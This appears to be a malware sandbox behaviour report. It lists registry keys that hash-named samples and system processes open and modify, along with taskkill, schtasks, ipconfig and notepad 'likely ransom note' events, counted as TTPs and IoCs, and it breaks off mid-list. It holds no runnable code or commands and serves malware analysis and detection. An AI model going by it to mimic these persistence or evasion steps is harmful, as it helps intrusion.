Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
-
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process
24648 ipconfig.exe -
Kills process with taskkill 2 IoCs
pid Process
3012 taskkill.exe
22928 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 
13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\TypedURLs taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\IESettingSync explorer.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies data under HKEY_USERS 20 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895701868183330" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\L1041" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 040000000500000003000000020000000100000000000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\NodeSlot = "18" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15 explorer.exe Key created 
\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{D6D9E004-CD87-442B-9D57-5E0AEB4F6F72}\GroupByDirection = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\5 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech SW Voice Activation - Japanese (Japan)" SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.html cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "16000" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1216" explorer.exe Set 
value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "MS-1033-110-WINMO-DNN" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; currency=NativeSupported; url=NativeSupported; address=NativeSupported; alphanumeric=NativeSupported; message=NativeSupported; computer=NativeSupported" SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" SearchApp.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "CC" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "11.0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.html\ = "NotSoCleverBotFile" cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{37A9D401-0BF5-4366-9530-C75C6DC23EC9}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "German Phone Converter" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\tn1040.bin" SearchApp.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft David - English (United States)" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "5223743" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = 
"%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\c1040.fe" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 0400000003000000020000000100000000000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Cosimo" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" explorer.exe Set value (str) 
\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\SniffedFolderType = "Documents" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost_ = 6801000088020000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 
0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" SearchApp.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process
29384 reg.exe
24432 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process
14636 NOTEPAD.EXE
3464 NOTEPAD.EXE
14200 Notepad.exe -
Runs net.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
2368 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 64 IoCs
pid Process 4200 explorer.exe 4200 explorer.exe 20104 drpbx.exe 20148 firefox.exe 20232 firefox.exe 20312 firefox.exe 20392 firefox.exe 20472 firefox.exe 20556 firefox.exe 20636 firefox.exe 20716 firefox.exe 20796 firefox.exe 20880 firefox.exe 20960 firefox.exe 21040 firefox.exe 21120 firefox.exe 21200 firefox.exe 21280 firefox.exe 21356 firefox.exe 21444 firefox.exe 10336 firefox.exe 10416 firefox.exe 10500 firefox.exe 10576 firefox.exe 10660 firefox.exe 10740 firefox.exe 10820 firefox.exe 21552 firefox.exe 21632 firefox.exe 21716 firefox.exe 21796 firefox.exe 21876 firefox.exe 21956 firefox.exe 22036 firefox.exe 22116 firefox.exe 22196 firefox.exe 22276 firefox.exe 22360 firefox.exe 22452 firefox.exe 22540 firefox.exe 22624 firefox.exe 22704 firefox.exe 22788 firefox.exe 22920 firefox.exe 23240 firefox.exe 23376 firefox.exe 23496 firefox.exe 23656 firefox.exe 23800 firefox.exe 23928 firefox.exe 24048 firefox.exe 24144 firefox.exe 24276 firefox.exe 24408 firefox.exe 24516 firefox.exe 24656 firefox.exe 24812 firefox.exe 24924 firefox.exe 25020 firefox.exe 25148 firefox.exe 25252 firefox.exe 25340 firefox.exe 25428 firefox.exe 25508 firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 3984 sdiagnhost.exe 3984 sdiagnhost.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 4852 msedge.exe 4852 msedge.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 